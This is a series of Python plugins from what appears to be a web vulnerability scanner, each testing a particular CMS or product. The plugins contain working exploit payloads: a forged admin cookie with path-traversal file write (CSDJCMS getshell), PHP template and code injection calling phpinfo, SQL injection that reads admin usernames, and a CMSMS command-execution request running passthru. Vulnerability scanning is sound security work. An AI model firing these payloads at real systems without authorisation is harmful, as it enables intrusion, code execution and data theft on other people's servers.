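    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload_url = scheme + "://" + url + ":" + str(port)
        referer = scheme + "://" + url
        headers = {
            "Host": "{}".format(url),
            "User-Agent": RandomAgent,
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Referer":
            "{}/admin/admin_t ... ;file=artindex.html".format(referer),
            # Forged admin session: the CMS is expected to trust these values.
            "Cookie":
            "S_Permission=1,2,3,4,5,6,7,8,9,10,11,12,13,14,15; S_Login=d8d998f3eb371c2009acd8580c1821d0; S_AdminUserName=1; S_AdminPassWord=1; S_AdminID=1; CNZZDATA4170884=cnzz_eid%3D1098390420-1364934762-http%253A%252F%252Fwww.hshxs.com%26ntime%3D1364935608%26cnzz_a%3D19%26retime%3D1365111972892%26sin%3Dnone%26ltime%3D1365111972892%26rtime%3D0; bdshare_firstime=1365107576347; PHPSESSID=u6kd9d6f18fhfr9bi4if6agcj6",
            "Connection": "keep-alive",
            "Content-Type": "application/x-www-form-urlencoded",
        }
        # FileName=cs-bottom.php&content=<?php phpinfo ?>&folder=../skins/index/html/&...
        data = "FileName=cs-bottom.php&content=%3C%3Fphp+phpinfo+%3F%3E&folder=..%2Fskins%2Findex%2Fhtml%2F&tempname=%C4%AC%C8%CF%C4%A3%B0%E6&Submit=%D0%DE%B8%C4%B5%B1%C7%B0%C4%A3%B0%E5"
        s = requests.session()
        # verify=False: scanner convention, target certificates are not validated.
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      timeout=6,
                      verify=False)
        con = resp.text
        if 'PHP Version' in con and 'System' in con:
            Medusa = "{}存在CSDJCMSGetshell\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # record url + evidence
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # url is the per-target file name
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, _)  # target + plugin name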
def medusa(Url: str, RandomAgent: str, Token, proxies=None) -> None:
    """Detect an exposed PHP probe page at ``/install/phpinfo.php``.

    A 200 whose body contains ``System``, ``Configure Command``, ``PHP`` and
    ``IPv6 Support`` is reported through ``VulnerabilityDetails`` and
    ``WriteFile``.  Errors go to ``ErrorHandling().Outlier`` and ``ErrorLog``.

    Args:
        Url: target, split by ``UrlProcessing``.
        RandomAgent: ``User-Agent`` header value.
        Token: opaque value forwarded to ``VulnerabilityDetails``.
        proxies: proxy spec, normalised by ``ClassCongregation.Proxies``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80

    phpinfo_markers = ('System', 'Configure Command', 'PHP', 'IPv6 Support')
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    try:
        target = scheme + "://" + url + ":" + str(port) + "/install/phpinfo.php"
        # verify=False: scanner convention, target certificates are not validated.
        resp = requests.session().get(target,
                                      headers=headers,
                                      timeout=6,
                                      proxies=proxies,
                                      verify=False)
        body = resp.text
        if resp.status_code != 200:
            return
        if not all(m in body for m in phpinfo_markers):
            return
        Medusa = "{}存在php探针漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
            url, target, body)
        _t = VulnerabilityInfo(Medusa)
        ClassCongregation.VulnerabilityDetails(
            _t.info, url, Token).Write()  # record url + evidence
        ClassCongregation.WriteFile().result(
            str(url), str(Medusa))  # url is the per-target file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(url, _)  # target + plugin name
def medusa(Url: str, RandomAgent: str, Token, proxies=None) -> None:
    """Error-based SQL injection check against ``/index.php/Message/add``.

    The ``contacts[...]`` form key breaks out of the INSERT column list and adds
    ``updatexml(1,concat(0x3a,user()),1)``.  A 200 whose body shows the
    framework's SQL error page (``错误信息``, ``执行SQL发生错误``) together with the
    injected fragment is reported through ``VulnerabilityDetails`` and
    ``WriteFile``.  Errors go to ``ErrorHandling().Outlier`` and ``ErrorLog``.

    Args:
        Url: target, split by ``UrlProcessing``.
        RandomAgent: ``User-Agent`` header value.
        Token: opaque value forwarded to ``VulnerabilityDetails``.
        proxies: proxy spec, normalised by ``ClassCongregation.Proxies``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80

    form = "contacts[content`,`create_time`,`update_time`) VALUES ('1', '1' ,1 and updatexml(1,concat(0x3a,user()),1) );-- a] = 11231231313&mobile=2&content=3"
    # All three must appear for a hit: error banner, echoed SQL, error footer.
    error_markers = (
        '错误信息',
        '''(`content`,`create_time`,`update_time`) VALUES ('1', '1' ,1 and updatexml(1,concat(0x3a,user()),1) )''',
        '执行SQL发生错误',
    )
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    try:
        target = scheme + "://" + url + ":" + str(port) + "/index.php/Message/add"
        # verify=False: scanner convention, target certificates are not validated.
        resp = requests.post(target,
                             headers=headers,
                             timeout=6,
                             data=form,
                             proxies=proxies,
                             verify=False)
        body = resp.text
        if resp.status_code == 200 and all(m in body for m in error_markers):
            Medusa = "{} 存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, target, body)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, Token).Write()  # record url + evidence
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # url is the per-target file name
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(url, _)  # target + plugin name
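def Main(Url, FileName, Values, ProxyIp) -> None:
    """Run the three Jenkins plugins against ``Url`` and append each result to ``FileName``.

    Fixes: previously all three ``medusa`` calls ran eagerly while building a
    list, so one raising plugin aborted the whole run before anything was
    written, and the write loop used a bare ``except:``.  Plugins are now
    invoked one at a time under the progress bar; a failing plugin is skipped
    (``Exception`` only, so Ctrl-C still propagates).

    Args:
        Url: target passed straight to each plugin.
        FileName: output file handed to ``ClassCongregation.WriteFile``.
        Values: user-supplied browser header selection for ``UserAgentS``.
        ProxyIp: third positional argument of every plugin's ``medusa``.
    """
    WriteFile = ClassCongregation.WriteFile(
        FileName)  # output writer for this target (must be created first)
    ua = ClassCongregation.UserAgentS(Values)  # user-chosen browser header
    RandomAgent = ua.UserAgent()
    plugins = (
        JenkinsArbitraryFileReadVulnerability.medusa,
        JenkinsRemoteCommandExecutionVulnerability.medusa,
        JenkinsConfigurationErrorCausesUnauthorizedCodeExecutionVulnerability.medusa,
    )
    for plugin in tqdm(plugins, ascii=True, desc="Jenkins plugin progress"):
        try:
            WriteFile.Write(str(plugin(Url, RandomAgent, ProxyIp)))
        except Exception:
            # Best-effort: one broken plugin must not stop the rest.
            continue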
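def Main(Url, FileName, Values, ProxyIp) -> None:
    """Run the Umail plugins under ``Cms.Umail`` against ``Url``.

    Each plugin's ``medusa(Url, RandomAgent, ProxyIp)`` result is appended to
    ``FileName``.  Fix: the bare ``except: pass`` blocks (which also swallowed
    ``KeyboardInterrupt``) became a loop catching ``Exception`` only; the stale
    commented-out Nginx print was removed.

    Args:
        Url: target passed straight to each plugin.
        FileName: output file handed to ``ClassCongregation.WriteFile``.
        Values: user-supplied browser header selection for ``UserAgentS``.
        ProxyIp: third positional argument of every plugin's ``medusa``.
    """
    WriteFile = ClassCongregation.WriteFile(
        FileName)  # output writer for this target (must be created first)
    ua = ClassCongregation.UserAgentS(Values)  # user-chosen browser header
    RandomAgent = ua.UserAgent()
    plugin_names = ("Umail_sessionid_access", "Umail_physical_path")
    for name in plugin_names:
        try:
            plugin = getattr(Cms.Umail, name)
            WriteFile.Write(plugin.medusa(Url, RandomAgent, ProxyIp))
        except Exception:
            # Best-effort: one broken plugin must not stop the rest.
            continue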
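def Main(Url, FileName, Values, ProxyIp) -> None:
    """Run the Joomla plugins under ``Cms.Joomla`` against ``Url``.

    Each plugin's ``medusa(Url, RandomAgent, ProxyIp)`` result is appended to
    ``FileName``.  Fix: the bare ``except: pass`` blocks (which also swallowed
    ``KeyboardInterrupt``) became a loop catching ``Exception`` only; the stale
    commented-out Nginx print was removed.

    Args:
        Url: target passed straight to each plugin.
        FileName: output file handed to ``ClassCongregation.WriteFile``.
        Values: user-supplied browser header selection for ``UserAgentS``.
        ProxyIp: third positional argument of every plugin's ``medusa``.
    """
    WriteFile = ClassCongregation.WriteFile(
        FileName)  # output writer for this target (must be created first)
    ua = ClassCongregation.UserAgentS(Values)  # user-chosen browser header
    RandomAgent = ua.UserAgent()
    plugin_names = ("Joomla_com_docman_lfi", "Joomla_index_list_sqli")
    for name in plugin_names:
        try:
            plugin = getattr(Cms.Joomla, name)
            WriteFile.Write(plugin.medusa(Url, RandomAgent, ProxyIp))
        except Exception:
            # Best-effort: one broken plugin must not stop the rest.
            continue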
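def Main(Url, FileName, Values, ProxyIp):
    """Run the Metinfo plugins against ``Url`` and write each result to ``FileName``.

    Args:
        Url: Target passed unchanged to every plugin.
        FileName: Result file name handed to ClassCongregation.WriteFile
            (declaring the writer first is required by the framework).
        Values: User's browser choice, consumed by UserAgentS.
        ProxyIp: Proxy setting forwarded unchanged to every plugin.

    Plugins run best-effort: one failing never prevents the next from running.
    Returns None.
    """
    WriteFile = ClassCongregation.WriteFile(FileName)
    ua = ClassCongregation.UserAgentS(Values)  # user-specified browser header
    RandomAgent = ua.UserAgent()  # generated User-Agent string
    # `except Exception` instead of a bare `except:` so KeyboardInterrupt and
    # SystemExit still abort the scan; plugin failures remain best-effort.
    try:
        Medusa = Cms.Metinfo.Metinfo_login_check_sqli.medusa(Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except Exception:
        pass
    try:
        Medusa = Cms.Metinfo.Metinfo_getpassword_sqli.medusa(Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except Exception:
        pass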
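def Main(Url, FileName, Values, ProxyIp):
    """Run the OpenSNS plugins against ``Url`` and write each result to ``FileName``.

    Args:
        Url: Target passed unchanged to every plugin.
        FileName: Result file name handed to ClassCongregation.WriteFile
            (declaring the writer first is required by the framework).
        Values: User's browser choice, consumed by UserAgentS.
        ProxyIp: Proxy setting forwarded unchanged to every plugin.

    Plugins run best-effort: one failing never prevents the next from running.
    Returns None.
    """
    WriteFile = ClassCongregation.WriteFile(FileName)
    ua = ClassCongregation.UserAgentS(Values)  # user-specified browser header
    RandomAgent = ua.UserAgent()  # generated User-Agent string
    # `except Exception` instead of a bare `except:` so KeyboardInterrupt and
    # SystemExit still abort the scan; plugin failures remain best-effort.
    try:
        Medusa = Cms.Opensns.Opensns_index_getshell.medusa(Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except Exception:
        pass
    try:
        Medusa = Cms.Opensns.Opensns_index_arearank.medusa(Url, RandomAgent, ProxyIp)
        WriteFile.Write(Medusa)
    except Exception:
        pass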
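def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe ``Url`` for PbootCMS template injection (``keyword`` -> ``phpinfo``).

    Args:
        Url: Target; UrlProcessing splits it into scheme, host and port.
        RandomAgent: User-Agent string to send.
        proxies: Proxy spec, normalised via ClassCongregation.Proxies. NOTE it is
            resolved but never applied: the urllib call below goes direct.
        **kwargs: Forwarded to VulnerabilityDetails when a hit is recorded.

    A hit (HTTP 200 whose body carries the phpinfo() markers) is recorded via
    VulnerabilityDetails and WriteFile; any failure goes to ErrorHandling and
    ErrorLog. Returns None.
    """
    import gzip
    import zlib

    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/index.php/index/index?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        header = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        req = request.Request(payload_url, headers=header)
        # NOTE(review): unlike the requests-based plugins this call honours
        # neither `proxies` nor `verify=False`: it goes direct and verifies
        # TLS, so self-signed HTTPS targets end up in the error log.
        # A timeout keeps a stalled target from hanging the whole scan (the
        # requests-based plugins use 6 s too); `with` closes the response.
        with request.urlopen(req, timeout=6) as response:
            raw = response.read()
            code = response.getcode()
            encoding = (response.headers.get('Content-Encoding') or '').lower()
        # We advertise gzip/deflate but urllib does not decompress for us, so a
        # compressed body previously failed in .decode() and was logged as a
        # plugin error -- a silent false negative on exactly the hosts that
        # compress responses.
        if encoding == 'gzip':
            raw = gzip.decompress(raw)
        elif encoding == 'deflate':
            try:
                raw = zlib.decompress(raw)
            except zlib.error:
                raw = zlib.decompress(raw, -zlib.MAX_WBITS)  # raw deflate stream
        con = raw.decode('utf8', errors='replace')
        markers = ('System', 'Build Date', 'Compiler', 'PHP Version')
        if code == 200 and all(con.find(m) != -1 for m in markers):
            Medusa = "{} 存在PbootCMS命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # record the hit for this url
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # result file is named after the target url
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)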
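def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe ``Url`` for Nginx CRLF injection using the module-level ``Payload``.

    Args:
        Url: Target; UrlProcessing splits it into scheme, host and port.
        RandomAgent: User-Agent string to send.
        proxies: Proxy spec, normalised via ClassCongregation.Proxies.
        **kwargs: Forwarded to VulnerabilityDetails on a hit.

    A hit is a 302 whose Set-Cookie header carries the injected ``a=1``; it is
    recorded via VulnerabilityDetails and WriteFile. Failures go to
    ErrorHandling/ErrorLog. Returns None.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload  # Payload: module-level constant
    host = url + ':' + str(port)
    headers = {
        'Host': host,
        'Accept-Encoding': 'gzip, deflate',
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language':
        'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
    }

    try:
        # No redirects: the 302 itself is the signal, and following it would
        # replace the response whose Set-Cookie we need to inspect.
        resp = requests.get(PayloadUrl,
                            headers=headers,
                            timeout=5,
                            proxies=proxies,
                            allow_redirects=False)

        # A 302 with no Set-Cookie at all is the ordinary non-vulnerable case;
        # it used to raise AttributeError on None.lower() and be logged as a
        # plugin error instead of a clean miss.
        con = resp.headers.get('Set-Cookie') or ''
        code = resp.status_code
        if code == 302 and con.lower().find('a=1') != -1:
            Medusa = "{} 存在Nginx_CRLF注入漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format(
                url, PayloadUrl)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # record the hit for this url
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # result file is named after the target url
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)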
def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe ``Url`` for the B2Bbuilder ``business_info_list`` SQL injection.

    Args:
        Url: Target; UrlProcessing splits it into scheme, host and port.
        RandomAgent: User-Agent string to send.
        UnixTimestamp: Scan timestamp handed to VulnerabilityDetails.

    The POST body injects an ``updatexml`` error whose text embeds ``md5('c')``;
    a 200 response containing that hash is recorded via VulnerabilityDetails
    and WriteFile. Failures are routed to ErrorHandling/ErrorLog. Returns None.

    NOTE(review): besides ``md5(c)`` the error text also pulls ``user`` from
    ``hy_admin``, so a hit copies admin usernames from the target into the
    result file; the hash alone would prove the injection. Confirm that this
    data collection is within scope before running it.
    """
    scheme, url, port = UrlProcessing(Url)
    default_ports = {'https': 443, 'http': 80}
    if port is None:
        port = default_ports.get(scheme)
    try:
        endpoint = '/main.php?m=company&s=admin/business_info_list'
        target = scheme + "://" + url + ":" + str(port) + endpoint

        body = "del[]=1) or updatexml(2,concat(0x7e,((select group_concat(user,0x5e,md5(c)) from hy_admin))),0) %23&updateID=11&cc=6750"
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        session = requests.session()
        resp = session.post(target,
                            data=body,
                            headers=request_headers,
                            timeout=6,
                            verify=False)
        page = resp.text
        # 4a8a08f0... is md5('c'): its presence means the injected expression
        # was evaluated by the database and echoed back in the error.
        found = resp.status_code == 200 and "4a8a08f09d37b73795649038408b5f33" in page
        if found:
            Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\nPost数据:{}\r\n返回内容:{}\r\n".format(
                url, target, body, page)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin)
        ClassCongregation.ErrorLog().Write(url, plugin)
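def medusa(**kwargs) -> None:
    """Probe Weaver (泛微) OA ``WorkflowCenterTreeData.jsp`` for SQL injection.

    Keyword Args:
        Url: Target base URL; the endpoint path is appended to it as-is.
        Headers: Base request headers. Copied here, never mutated.
        Proxies: Proxy dict passed straight to requests.

    Posts a ``formids`` value carrying an Oracle ``union select`` against
    ``v$instance``; a 200 response shaped like the tree JSON (``"draggable":``,
    ``"checked":``, ``"id":``, ``"text":``) is recorded via VulnerabilityDetails
    (which receives the response object here) and WriteFile. Failures go to
    ErrorHandling/ErrorLog.
    """
    url = kwargs.get("Url")
    # Copy: the original wrote Content-Type/Accept into the caller's dict, so
    # they leaked into every later plugin sharing that Headers object. `or {}`
    # also tolerates a missing/None Headers instead of raising on item access.
    Headers = dict(kwargs.get("Headers") or {})
    proxies = kwargs.get("Proxies")
    # Built once so the request and the written report carry identical bytes.
    formids = ('11111111111)))' + '\x0a\x0d' * 360 +
               'union select NULL,instance_name from '
               'v$instance order by (((1')
    try:
        payload = "/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333"
        payload_url = url + payload

        Headers['Content-Type'] = 'application/x-www-form-urlencoded'
        Headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'

        s = requests.session()
        resp = s.post(payload_url,
                      data={'formids': formids},
                      headers=Headers,
                      timeout=6,
                      proxies=proxies,
                      verify=False)
        con = resp.text.lower()
        code = resp.status_code
        markers = ('"draggable":', '"checked":', '"id":', '"text":')
        if code == 200 and all(m in con for m in markers):
            Medusa = "{}存在泛微OA_WorkflowCenterTreeData接口注入漏洞\r\n 验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format(
                url, payload_url, formids)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, resp, **kwargs).Write()  # this plugin hands over the response object
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # result file is named after the target url
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # str(url): a None Url must not raise a second error inside the handler.
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + str(url), e)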
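def medusa(Url,RandomAgent,ProxyIp):
    """Probe ``Url`` for CmsTop remote code execution (``test=${@phpinfo()}``).

    Args:
        Url: Target; ClassCongregation.UrlProcessing splits it.
        RandomAgent: User-Agent string to send.
        ProxyIp: Accepted for interface compatibility; this plugin does not use it.

    Two URLs are tried: the ``/app/`` search endpoint on the target host, and
    the same endpoint on the ``app.`` sibling of the target's parent domain.
    A 200 body with the phpinfo() markers is recorded via VulnerabilityDetails
    (severity High) and WriteFile. Returns the newline-joined hit reports as a
    string, or None when nothing was found.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80

    payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    payloadurl = scheme + "://" + url + ":" + str(port) + payload
    Payloads = [payloadurl]

    payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    # Parent domain of the target host: www.example.com -> example.com.
    domain_name = ".".join(url.split(".")[1:])
    # The sibling host used to be built as "app" + domain_name, which gave
    # "appexample.com" (no dot) and could never reach the intended vhost.
    # Skip it for a bare hostname (no parent domain) or an IPv4 literal.
    # NOTE(review): app.<parent> is a different host from the one supplied;
    # make sure it is inside the engagement scope before probing it.
    if domain_name and not url.replace(".", "").isdigit():
        Payloads.append(scheme + "://app." + domain_name + ":" + str(port) + payload2)
    Medusas = []  # hit reports collected for the return value

    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    for payload_url in Payloads:
        try:
            s = requests.session()
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            code = resp.status_code
            if code == 200 and con.find('PHP Version') != -1 and con.find('Configure Command') != -1:
                Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
                _t=VulnerabilityInfo(Medusa)
                web=ClassCongregation.VulnerabilityDetails(_t.info)
                web.High()  # severity levels: serious, High, Intermediate, Low
                ClassCongregation.WriteFile().result(str(url),str(Medusa))  # result file is named after the target url
                # Previously nothing was ever appended, so the function always
                # returned None and callers writing its return value got nothing.
                Medusas.append(Medusa)

        except Exception:
            _ = VulnerabilityInfo('').info.get('algroup')
            _l = ClassCongregation.ErrorLog().Write(url, _)  # log target url and plugin name

    if Medusas:
        return "".join(m + "\n" for m in Medusas)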
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe ``Url`` for reflected XSS in CraftedWeb ``notice.php`` (``e`` param).

    Args:
        Url: Target; ClassCongregation.UrlProcessing splits it.
        RandomAgent: User-Agent string to send.
        proxies: Proxy spec, normalised via ClassCongregation.Proxies.
        **kwargs: Forwarded to VulnerabilityDetails on a hit.

    Sends ``<img src=x onerror=alert('<random>')>`` in ``e`` and records a hit
    when the 200 body contains ``<script>alert(<random>)</script>``.
    NOTE(review): the injected string and the string searched for differ (an
    img/onerror with quotes vs. a bare script tag without quotes), so this can
    only fire if notice.php itself rewrites the input that way -- confirm
    against the application before trusting a miss. Returns None.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    default_ports = {'https': 443, 'http': 80}
    if port is None:
        port = default_ports.get(scheme)
    try:
        # Random marker so a static or cached page cannot produce a hit.
        token = ClassCongregation.randoms().result(20)
        endpoint = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(token)
        target = scheme + "://" + url + ":" + str(port) + endpoint
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }

        resp = requests.get(target,
                            headers=request_headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        page = resp.text
        expected = '<script>alert({})</script>'.format(token)
        if resp.status_code == 200 and expected in page:
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, target, page)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin)
        ClassCongregation.ErrorLog().Write(url, plugin)
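def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe ``Url`` for boolean-blind SQL injection in 74CMS ``wap-company-show.php``.

    Args:
        Url: Target; UrlProcessing splits it into scheme, host and port.
        RandomAgent: User-Agent string to send.
        UnixTimestamp: Scan timestamp handed to VulnerabilityDetails.

    Two requests differ only in the injected comparison (``=52`` vs ``=53`` on
    the first character of ``md5(0x11)``), so on a vulnerable host at most one
    of them is true and the pages differ. A hit is recorded via
    VulnerabilityDetails and WriteFile; failures go to ErrorHandling/ErrorLog.
    Returns None.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        true_payload = "/wap/wap-company-show.php?id=1%20and%20ascii(substring((md5(0x11)),1,1))=52"
        false_payload = "/wap/wap-company-show.php?id=1%20and%20ascii(substring((md5(0x11)),1,1))=53"
        payload_url = scheme + "://" + url + ":" + str(port) + true_payload
        payload_url2 = scheme + "://" + url + ":" + str(port) + false_payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False)
        con = resp.text
        con2 = resp2.text
        code = resp.status_code
        code2 = resp2.status_code
        marker = 'url="wap-jobs-show.php?id=1"'
        seen_a = con.find(marker) != -1
        seen_b = con2.find(marker) != -1
        # Boolean-blind injection is evidenced by the two conditions rendering
        # DIFFERENT pages. The previous check required the marker in BOTH
        # responses -- which is also what an unaffected host returns -- so it
        # flagged every 74CMS install serving this page. Requiring exactly one
        # hit keeps the same true/false pair but removes that false positive.
        # NOTE(review): if the application is genuinely expected to show the
        # marker for both conditions, revisit this; the differential is the only
        # defensible signal for a boolean-blind probe.
        if code == 200 and code2 == 200 and seen_a != seen_b:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # record the hit for this url
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # result file is named after the target url
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log target url and plugin name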
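def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe ``Url`` for CMSMS user-defined-tag command execution.

    Args:
        Url: Target; ClassCongregation.UrlProcessing splits it.
        RandomAgent: User-Agent string to send.
        UnixTimestamp: Scan timestamp handed to VulnerabilityDetails.

    WARNING: this is not a passive check. On a vulnerable host the posted
    ``code=passthru('dir')`` really executes ``dir`` on the target, and the
    hard-coded ``_sk_`` value is sent as the session key. A response containing
    the ``{"response":"Success",...`` JSON is recorded via VulnerabilityDetails
    and WriteFile; failures go to ErrorHandling/ErrorLog. Returns None.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
        data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            # Content-Length is deliberately not hard-coded: requests derives it
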